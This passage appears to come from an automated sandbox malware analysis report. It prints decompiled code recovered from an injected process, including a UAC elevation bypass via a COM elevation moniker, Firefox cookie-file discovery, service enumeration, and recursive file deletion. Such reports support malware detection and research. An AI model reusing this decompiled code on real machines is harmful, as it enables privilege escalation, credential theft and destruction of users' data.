                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004135B1
                    • GetProcAddress.KERNEL32(00000000), ref: 004135B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: P4G$P4G$P4G$P4G$SHDeleteKeyW$Shlwapi.dll
                    • API String ID: 2127411465-531188865
                    • Opcode ID: f96d1dcb41151ad38e22bd17a9dc74bcd221924d5de400f0a1de3e25893a3e1b
                    • Instruction ID: ee582708a1ecfa71abd053f628b5a3b7b6646190f40a2f0f90fdaba40559649c
                    • Opcode Fuzzy Hash: f96d1dcb41151ad38e22bd17a9dc74bcd221924d5de400f0a1de3e25893a3e1b
                    • Instruction Fuzzy Hash: 07E1FD72A0430067C614BB76DC579AE32A99F95718F40063FF906B71E2ED7D8B44829F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406B71 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                    Download Yara Rule
                    C-Code - Quality: 15%
                    			E00406B71(void* __edx, void* __eflags, signed int* _a8) {
				signed int _v8;
				intOrPtr _v24;
				char _v44;
				char _v564;
				void* _t14;
				char* _t25;
				char* _t34;

				_push("[+] ucmAllocateElevatedObject\n");
				E00406874(__eflags);
				_v8 = _v8 & 0x00000000;
				_t33 = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
				_t34 = 0x80004005;
				_t14 = E0043A3D6(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
				_t38 = _t14 - 0x40;
				if(_t14 <= 0x40) {
					E00406804();
					_v44 = 0x24;
					_v24 = 4;
					E0043E0D9( &_v564, L"Elevation:Administrator!new:");
					E0043E0FB( &_v564, _t33);
					E00406874(_t38);
					_t25 =  &_v564;
					__imp__CoGetObject(_t25,  &_v44, 0x4644e0,  &_v8, "[+] CoGetObject\n");
					_t34 = _t25;
					_t39 = _t34;
					if(_t34 == 0) {
						_push("[+] CoGetObject SUCCESS\n");
					} else {
						_push("[-] CoGetObject FAILURE\n");
					}
					E00406874(_t39);
				}
				 *_a8 = _v8;
				return _t34;
			}










                    0x00406b7c
                    0x00406b81
                    0x00406b86
                    0x00406b8a
                    0x00406b90
                    0x00406b95
                    0x00406b9c
                    0x00406b9f
                    0x00406ba4
                    0x00406baf
                    0x00406bbc
                    0x00406bc3
                    0x00406bd0
                    0x00406bda
                    0x00406bef
                    0x00406bf6
                    0x00406bfc
                    0x00406bfe
                    0x00406c00
                    0x00406c09
                    0x00406c02
                    0x00406c02
                    0x00406c02
                    0x00406c0e
                    0x00406c13
                    0x00406c1b
                    0x00406c23

                    APIs
                    • _wcslen.LIBCMT ref: 00406B95
                    • CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 240030777-3166923314
                    • Opcode ID: 4bd05bc437bb636873ceba696c3429efc5e4b6ee891bd5b16dcec18cd7c856bf
                    • Instruction ID: 6bce67489c7e09321c684eae8049871ec0f9a08aead341868aa49f1d7bf40555
                    • Opcode Fuzzy Hash: 4bd05bc437bb636873ceba696c3429efc5e4b6ee891bd5b16dcec18cd7c856bf
                    • Instruction Fuzzy Hash: 91110A72901218A6DB10F7D5C845F8E77BCDB44714F11006BF905B2280EB7CCA54867E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004192A3 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E004192A3(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				void* _t194;
				short** _t195;
				int _t196;
				struct _ENUM_SERVICE_STATUS* _t197;
				int _t198;
				struct _QUERY_SERVICE_CONFIG* _t201;
				void* _t202;

				_t185 = __edx;
				_t200 = 0;
				_t194 = __ecx;
				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					_t135 = _t202 + 0x4c;
					E00401F66(_t133, _t202 + 0x4c);
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x28) = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E00403242(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
						E00401EE9();
						L13:
						return _t194;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t196 =  *(_t202 + 0x18);
					_push(_t196);
					_t200 = E0043A620(_t135);
					 *(_t202 + 0x30) = _t200;
					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					_t197 = 0;
					 *(_t202 + 0x28) = 0;
					__eflags =  *(_t202 + 0x14);
					if(__eflags <= 0) {
						L11:
						L0043A61B(_t200);
						goto L12;
					}
					_t195 = _t200;
					_t201 =  *(_t202 + 0x2c);
					do {
						E0040323D(E004042DC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040415E(_t133, _t202 + 0x38, _t185, _t201, "\t")));
						E00401EE9();
						E00401EE9();
						E0040323D(E004042DC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040415E(_t133, _t202 + 0x68, _t195[1], _t201, "\t")));
						E00401EE9();
						E00401EE9();
						_t100 = E0040415E(_t133, _t202 + 0x80,  *_t195, _t201, "\t");
						_t185 = E0041A762(_t133, _t202 + 0x64, _t195[3]);
						E0040323D(E00402F85(_t202 + 0x38, _t101, _t100));
						E00401EE9();
						E00401EE9();
						E00401EE9();
						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t195, 1);
						_t160 = _t202 + 0x1c;
						 *(_t202 + 0x24) = _t107;
						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t198 =  *(_t202 + 0x1c);
								_push(_t198);
								_t201 = E0043A620(_t160);
								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
								_t199 = "\t";
								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, "\t"));
								E00401EE9();
								E00401EE9();
								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, "\t"));
								E00401EE9();
								E00401EE9();
								_t185 = E004042DC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040415E(_t133, _t202 + 0x6c, _t119, _t201, _t199));
								E0040323D(E00402FF4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
								E00401EE9();
								E00401EE9();
								E00401EE9();
								L0043A61B(_t201);
								_t197 =  *(_t202 + 0x2c);
							}
						}
						CloseServiceHandle( *(_t202 + 0x24));
						_t197 = _t197 + 1;
						_t195 =  &(_t195[9]);
						 *(_t202 + 0x28) = _t197;
						__eflags = _t197 -  *(_t202 + 0x14);
					} while (__eflags < 0);
					_t194 =  *(_t202 + 0x30);
					_t200 =  *(_t202 + 0x2c);
					goto L11;
				}
				E0040415E(_t133, _t194, _t185, 0, 0x46a8f0);
				goto L13;
			}


















                    0x004192a3
                    0x004192af
                    0x004192b1
                    0x004192b5
                    0x004192bf
                    0x004192c3
                    0x004192d6
                    0x004192da
                    0x004192e3
                    0x004192ec
                    0x004192f5
                    0x0041930e
                    0x00419310
                    0x0041957c
                    0x0041957d
                    0x0041958a
                    0x00419593
                    0x00419598
                    0x004195a4
                    0x004195a4
                    0x0041931c
                    0x00419321
                    0x00000000
                    0x00000000
                    0x00419327
                    0x0041932b
                    0x00419332
                    0x0041933d
                    0x0041934e
                    0x00419354
                    0x00419356
                    0x0041935a
                    0x0041935e
                    0x00419575
                    0x00419576
                    0x00000000
                    0x0041957b
                    0x00419364
                    0x00419366
                    0x0041936a
                    0x0041938b
                    0x00419394
                    0x0041939d
                    0x004193c2
                    0x004193cb
                    0x004193d4
                    0x004193e5
                    0x004193f7
                    0x00419408
                    0x00419411
                    0x0041941a
                    0x00419423
                    0x00419428
                    0x00419432
                    0x00419438
                    0x0041943c
                    0x00419445
                    0x0041944b
                    0x0041944d
                    0x00419453
                    0x00419459
                    0x0041945c
                    0x00419462
                    0x00419466
                    0x0041946d
                    0x0041947a
                    0x00419487
                    0x004194a6
                    0x004194af
                    0x004194b8
                    0x004194de
                    0x004194e7
                    0x004194f0
                    0x00419512
                    0x00419526
                    0x0041952f
                    0x00419538
                    0x00419541
                    0x00419547
                    0x0041954c
                    0x00419550
                    0x0041945c
                    0x00419555
                    0x0041955b
                    0x0041955c
                    0x0041955f
                    0x00419563
                    0x00419563
                    0x0041956d
                    0x00419571
                    0x00000000
                    0x00419571
                    0x004192cc
                    0x00000000

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00473838), ref: 004192B9
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419308
                    • GetLastError.KERNEL32 ref: 00419316
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041934E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    • API String ID: 3587775597-0
                    • Opcode ID: d22ff7c09391ab7c53f1240a3a0880e8a374c042e6d68de3355832e6c510aa4e
                    • Instruction ID: dba20098d3e66f28599fd06314c57e2e3311d68971aa7dbf5ba53787a6468409
                    • Opcode Fuzzy Hash: d22ff7c09391ab7c53f1240a3a0880e8a374c042e6d68de3355832e6c510aa4e
                    • Instruction Fuzzy Hash: 79816371508301ABC304EB61D8959AFB7E8FF94708F50082EF596521D2EF74EA49CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450E90 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00450E90(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46f00c; // 0x54ba778e
				_v8 = _t39 ^ _t109;
				_t3 =  &_a12; // 0x44336d
				_t89 =  *_t3;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00446A95(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00446A95(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x44336d
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x45e314; // 0x17
					E00450E33(0, 0x45e200, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x44336d
					E004507D0(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x44336d
						E004508B6(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x44336d
						E0045081B(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x45e1fc; // 0x41
						_t77 = E00450E33(_t99, 0x45def0, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E00450CBC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E004338BB(_v8 ^ _t109);
								}
								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E004407BF( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E004508B6(_t92, _t99,  &_v20);
						} else {
							E0045081B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                    0x00450e98
                    0x00450e9f
                    0x00450ea6
                    0x00450ea6
                    0x00450eaa
                    0x00450eae
                    0x00450ebc
                    0x00450ec1
                    0x00450ec2
                    0x00450ec3
                    0x00450ec4
                    0x00450ec9
                    0x00450ecc
                    0x00450ece
                    0x00450ed4
                    0x00450eda
                    0x00450edd
                    0x00450edf
                    0x00450ee2
                    0x00450ee6
                    0x00450eed
                    0x00450efa
                    0x00450eff
                    0x00450f02
                    0x00450f05
                    0x00450f05
                    0x00450f07
                    0x00450f0a
                    0x00450f0e
                    0x00450f7e
                    0x00450f80
                    0x00450f82
                    0x00450f95
                    0x00450f95
                    0x00450f9c
                    0x00450fa2
                    0x00450fa5
                    0x00000000
                    0x00450fa5
                    0x00450f84
                    0x00450f87
                    0x00000000
                    0x00000000
                    0x00450f89
                    0x00450f8d
                    0x00450f92
                    0x00000000
                    0x00450f15
                    0x00450f15
                    0x00450f19
                    0x00450f2b
                    0x00450f2f
                    0x00450f20
                    0x00450f20
                    0x00450f24
                    0x00450f24
                    0x00450f38
                    0x00450f39
                    0x00450fc3
                    0x00450fc3
                    0x00000000
                    0x00450f3f
                    0x00450f3f
                    0x00450f4e
                    0x00450f53
                    0x00450f58
                    0x00450fa8
                    0x00450fa8
                    0x00450fa8
                    0x00450faa
                    0x00450fae
                    0x00450fc5
                    0x00450fd1
                    0x00450fdb
                    0x00450fde
                    0x00450fdf
                    0x00450fe1
                    0x00000000
                    0x00000000
                    0x00450fe3
                    0x00450fe9
                    0x00000000
                    0x00000000
                    0x00450feb
                    0x00450ff1
                    0x00000000
                    0x00000000
                    0x00450ff7
                    0x00450ffd
                    0x00450fff
                    0x00000000
                    0x00000000
                    0x00451006
                    0x0045100c
                    0x0045100e
                    0x00000000
                    0x00000000
                    0x00451010
                    0x00451013
                    0x00451015
                    0x00451017
                    0x00451017
                    0x00451028
                    0x0045102d
                    0x0045102f
                    0x0045108f
                    0x00450fb2
                    0x00450fc2
                    0x00450fc2
                    0x0045103e
                    0x0045104e
                    0x00451054
                    0x00451056
                    0x00000000
                    0x00000000
                    0x0045106d
                    0x00451073
                    0x00451075
                    0x00000000
                    0x00000000
                    0x00451087
                    0x00000000
                    0x0045108c
                    0x00450fb0
                    0x00000000
                    0x00450fb0
                    0x00450f5a
                    0x00450f5c
                    0x00450f60
                    0x00450f76
                    0x00450f67
                    0x00450f6b
                    0x00450f6b
                    0x00450f7b
                    0x00000000
                    0x00450f7b
                    0x00450f39

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00450F9C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00450FF7
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00451006
                    • GetLocaleInfoW.KERNEL32(?,00001001,m3D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045104E
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045106D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: m3D$m3D$m3D
                    • API String ID: 745075371-2721598275
                    • Opcode ID: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                    • Instruction ID: ce2d0ce6400888a1d824562178e0f2167d8bdbd9356f1224e449ae4cf6748fee
                    • Opcode Fuzzy Hash: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                    • Instruction Fuzzy Hash: 1851A6769002059BEB30DFA5CC45ABFB7B8AF04702F14446BFD04E7292D7B89948CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B8C7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040B8C7(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __edi;
				void* __ebp;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				void* _t42;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;

				_t61 = __ebx;
				_t95 = __ecx;
				E0040415E(__ebx,  &_v28, __edx, _t96, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
				L004086C6(__ebx,  &_v28, _t93, _t96, L"\\Mozilla\\Firefox\\Profiles\\");
				_t91 =  &_v28;
				_t94 = FindFirstFileW(E00401EE4(E004087F0( &_v100,  &_v28, _t96, "*")),  &_v740);
				E00401EE9();
				if(_t94 != 0xffffffff) {
					E004020BF(_t61,  &_v76);
					while(1) {
						_t37 = FindNextFileW(_t94,  &_v740);
						__eflags = _t37;
						if(_t37 == 0) {
							break;
						}
						__eflags = _v740.dwFileAttributes & 0x00000010;
						if((_v740.dwFileAttributes & 0x00000010) == 0) {
							continue;
						} else {
							_t39 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), 0x4644f0);
							__eflags = _t39;
							if(_t39 == 0) {
								continue;
							} else {
								_t41 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), L"..");
								__eflags = _t41;
								if(_t41 == 0) {
									continue;
								} else {
									_t42 = E0040415E(_t61,  &_v148, _t91, _t96, L"\\cookies.sqlite");
									_t91 = E004087F0( &_v124,  &_v28, _t96,  &(_v740.cFileName));
									E00402F85( &_v52, _t44, _t42);
									E00401EE9();
									E00401EE9();
									__eflags = PathFileExistsW(E00401EE4( &_v52));
									if(__eflags != 0) {
										FindClose(_t94);
										E00403242(_t61, _t95, _t96, __eflags,  &_v52);
										E00401EE9();
									} else {
										E00401EE9();
										continue;
									}
								}
							}
						}
						L10:
						E00401FB8();
						goto L11;
					}
					FindClose(_t94);
					E0040415E(_t61, _t95, _t91, _t96, 0x46a8f0);
					goto L10;
				} else {
					E0040415E(_t61, _t95,  &_v28, _t96, 0x46a8f0);
				}
				L11:
				E00401EE9();
				return _t95;
			}




















                    0x0040b8c7
                    0x0040b8d7
                    0x0040b8e3
                    0x0040b8f0
                    0x0040b901
                    0x0040b91e
                    0x0040b920
                    0x0040b928
                    0x0040b93e
                    0x0040b9e0
                    0x0040b9e8
                    0x0040b9ee
                    0x0040b9f0
                    0x00000000
                    0x00000000
                    0x0040b948
                    0x0040b94f
                    0x00000000
                    0x0040b955
                    0x0040b961
                    0x0040b968
                    0x0040b96a
                    0x00000000
                    0x0040b96c
                    0x0040b978
                    0x0040b97f
                    0x0040b981
                    0x00000000
                    0x0040b983
                    0x0040b98e
                    0x0040b9a7
                    0x0040b9ac
                    0x0040b9b5
                    0x0040b9c0
                    0x0040b9d4
                    0x0040b9d6
                    0x0040ba22
                    0x0040ba2e
                    0x0040ba36
                    0x0040b9d8
                    0x0040b9db
                    0x00000000
                    0x0040b9db
                    0x0040b9d6
                    0x0040b981
                    0x0040b96a
                    0x0040ba09
                    0x0040ba0c
                    0x00000000
                    0x0040ba0c
                    0x0040b9f7
                    0x0040ba04
                    0x00000000
                    0x0040b92a
                    0x0040b931
                    0x0040b931
                    0x0040ba11
                    0x0040ba14
                    0x0040ba20

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000,?), ref: 0040B915
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040B9E8
                    • FindClose.KERNEL32(00000000), ref: 0040B9F7
                    • FindClose.KERNEL32(00000000), ref: 0040BA22
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 1164774033-405221262
                    • Opcode ID: 6c21396c8450d45ee7794ff9ed4451fb2f65ce247a2ed991887e1e6d573812c7
                    • Instruction ID: f7360795b1d381be77360ebb1d09811b65db7e4dd05c1cd4fb36acbf7292fd34
                    • Opcode Fuzzy Hash: 6c21396c8450d45ee7794ff9ed4451fb2f65ce247a2ed991887e1e6d573812c7
                    • Instruction Fuzzy Hash: 02315031A042195ACB14F7A2DC9AAEE77B8EF50718F10047FF501B21D2EF789A458A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041AC0A Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041AC0A(WCHAR* __ecx, void* __edx) {
				short _v524;
				short _v1044;
				struct _WIN32_FIND_DATAW _v1636;
				int _t41;
				long _t42;
				int _t51;
				signed int _t60;
				void* _t70;
				WCHAR* _t71;
				void* _t72;

				_t70 = __edx;
				_t71 = __ecx;
				E0043E0D9( &_v1044, __ecx);
				E0043E0FB( &_v1044, L"\\*");
				E0043E0D9( &_v524, _t71);
				E0043E0FB( &_v524, "\\");
				_t72 = FindFirstFileW( &_v1044,  &_v1636);
				if(_t72 == 0xffffffff) {
					L16:
					__eflags = 0;
					return 0;
				}
				E0043E0D9( &_v1044,  &_v524);
				_t60 = 1;
				do {
					_t41 = FindNextFileW(_t72,  &_v1636);
					_t76 = _t41;
					if(_t41 == 0) {
						_t42 = GetLastError();
						__eflags = _t42 - 0x12;
						if(_t42 != 0x12) {
							L15:
							FindClose(_t72);
							goto L16;
						}
						_t60 = 0;
						__eflags = 0;
						goto L13;
					}
					if(E0041ABDC( &(_v1636.cFileName), _t76) != 0) {
						goto L13;
					}
					E0043E0FB( &_v524,  &(_v1636.cFileName));
					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
						__eflags = _v1636.dwFileAttributes & 0x00000001;
						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v524, 0x80);
						}
						_t51 = DeleteFileW( &_v524);
						__eflags = _t51;
						if(_t51 == 0) {
							goto L15;
						} else {
							L10:
							E0043E0D9( &_v524,  &_v1044);
							goto L13;
						}
					}
					if(E0041AC0A( &_v524, _t70) == 0) {
						goto L15;
					}
					RemoveDirectoryW( &_v524);
					goto L10;
					L13:
				} while (_t60 != 0);
				FindClose(_t72);
				return RemoveDirectoryW(_t71);
			}













                    0x0041ac0a
                    0x0041ac1c
                    0x0041ac20
                    0x0041ac31
                    0x0041ac3e
                    0x0041ac4f
                    0x0041ac6b
                    0x0041ac70
                    0x0041ad61
                    0x0041ad61
                    0x00000000
                    0x0041ad61
                    0x0041ac84
                    0x0041ac8b
                    0x0041ac8d
                    0x0041ac95
                    0x0041ac9b
                    0x0041ac9d
                    0x0041ad35
                    0x0041ad3b
                    0x0041ad3e
                    0x0041ad5a
                    0x0041ad5b
                    0x00000000
                    0x0041ad5b
                    0x0041ad40
                    0x0041ad40
                    0x00000000
                    0x0041ad40
                    0x0041acb0
                    0x00000000
                    0x00000000
                    0x0041acc4
                    0x0041acd2
                    0x0041acf2
                    0x0041acf9
                    0x0041ad07
                    0x0041ad07
                    0x0041ad14
                    0x0041ad1a
                    0x0041ad1c
                    0x00000000
                    0x0041ad1e
                    0x0041ad1e
                    0x0041ad2c
                    0x00000000
                    0x0041ad32
                    0x0041ad1c
                    0x0041ace1
                    0x00000000
                    0x00000000
                    0x0041acea
                    0x00000000
                    0x0041ad42
                    0x0041ad42
                    0x0041ad4b
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD07
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD14
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                    • GetLastError.KERNEL32(?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD35
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD5B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
